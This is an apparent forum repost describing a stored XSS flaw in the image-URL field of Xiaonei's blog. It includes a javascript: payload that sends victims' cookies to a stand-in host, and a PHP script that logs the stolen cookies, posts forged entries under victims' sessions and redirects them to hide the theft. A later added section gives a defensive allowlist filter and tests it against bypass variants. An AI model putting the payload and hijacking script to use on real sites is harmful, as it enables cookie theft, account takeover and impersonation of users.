From: t00ls.net
Xiaonei (xiaonei.com) does not strictly filter the URL of an image inserted while posting a blog entry, so an XSS vulnerability exists.
When posting an entry, set the inserted image's URL to the code below; the payload fires when the entry is viewed normally, copied, or printed:
javascript:window.location.href='http://www.xxx.com/test.php?cookie='+document.cookie
test.php is used to steal the cookie, use it to impersonate the reader and post a blog entry in their name, and then redirect them to a normal entry. The code is as follows:
<?php
ob_start();
$url = "blog.xiaonei.com";
$cookie = $_GET['cookie'];
$cookie1 = $cookie."\n";
fputs(fopen("a.txt", "a+"), $cookie1); // append the stolen cookie to a.txt
// post a forged entry with the stolen cookie; malicious code can be inserted into it as well
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
$data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";
fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");
fwrite($sock, "Accept: */*\r\n");
fwrite($sock, "Referer: http://$url\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
fwrite($sock, "User-Agent: Mozilla\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
fwrite($sock, "Connection: Keep-Alive\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
fwrite($sock, "Cookie: ".$cookie."\r\n\r\n"); // blank line ends the headers
fwrite($sock, $data);
$headers = "";
while ($str = trim(fgets($sock, 4096)))
    $headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock)) // with Keep-Alive this waits until the server closes the connection
    $body .= fgets($sock, 4096);
fclose($sock);
// echo $body;
// redirect the victim to a normal entry so nothing looks wrong
header("Location: http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx");
ob_end_flush();
?>
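The filter the post says Xiaonei was missing, shown as an added example (this is not code from the original post and not Xiaonei's code): a naive prefix blacklist beside an allowlist check that normalises the URL the way a browser does and then accepts only http/https with a real host. Function names, the hypothetical image-URL handling, and the sample URLs are my own construction; the payload from the post is included among the inputs.

```php
<?php
// Added example, not from the original post: an allowlist check for a
// user-supplied image URL, the kind of filter the post says Xiaonei lacked.
// Function names and the sample URLs below are my own construction.

// A prefix blacklist like this one is the filter people usually write first.
// It only catches the literal lowercase prefix, so case changes, leading
// whitespace or newlines, and HTML entities all get past it.
function naive_image_url_filter(string $url): bool
{
    return strpos($url, 'javascript:') !== 0;
}

// Hardened check: undo the decoding a browser does before it parses the URL,
// then require an explicit http/https scheme and a plausible host. Anything
// else is rejected, so unknown tricks fail closed instead of needing a new
// blacklist entry.
function is_safe_image_url(string $url): bool
{
    // Attribute values are entity-decoded before the URL is parsed.
    $url = html_entity_decode($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // Browsers drop leading/trailing C0 controls and space, and strip
    // tab/CR/LF anywhere in the URL, so "java\nscript:" is still javascript:.
    $url = trim($url, " \t\n\r\0\x0B");
    $url = str_replace(["\t", "\n", "\r"], '', $url);
    if ($url === '' || preg_match('/[\x00-\x1f\x7f]/', $url)) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false; // no scheme (also rejects "//host/...") or unparsable
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false; // javascript:, data:, vbscript:, file:, ...
    }
    // parse_url is permissive about hosts; insist on a plain hostname.
    return preg_match('/^[A-Za-z0-9.-]+$/', $parts['host']) === 1;
}

// Constructed inputs: two benign image URLs, the payload from the post, and
// variants that beat the naive filter.
$cases = [
    'http://img.xiaonei.com/pic.jpg',
    'https://img.xiaonei.com/pic.jpg',
    "javascript:window.location.href='http://www.xxx.com/test.php?cookie='+document.cookie",
    'JaVaScRiPt:alert(1)',
    " \tjava\nscript:alert(1)",
    'javascript&#58;alert(1)',
    'data:text/html;base64,PHNjcmlwdD4=',
    '//www.xxx.com/test.php',
];
echo "naive  hardened  url\n";
foreach ($cases as $url) {
    printf("%-6s %-9s %s\n",
        naive_image_url_filter($url) ? 'pass' : 'block',
        is_safe_image_url($url)      ? 'pass' : 'block',
        addcslashes($url, "\0..\37"));
}
```

Run it with `php filter.php`: the naive filter passes everything except the plain lowercase payload, while the hardened check passes only the two http/https image URLs. Scheme-relative URLs (`//host/...`) are rejected here on purpose; a site that wants them would have to resolve them against its own origin before checking, not simply wave them through.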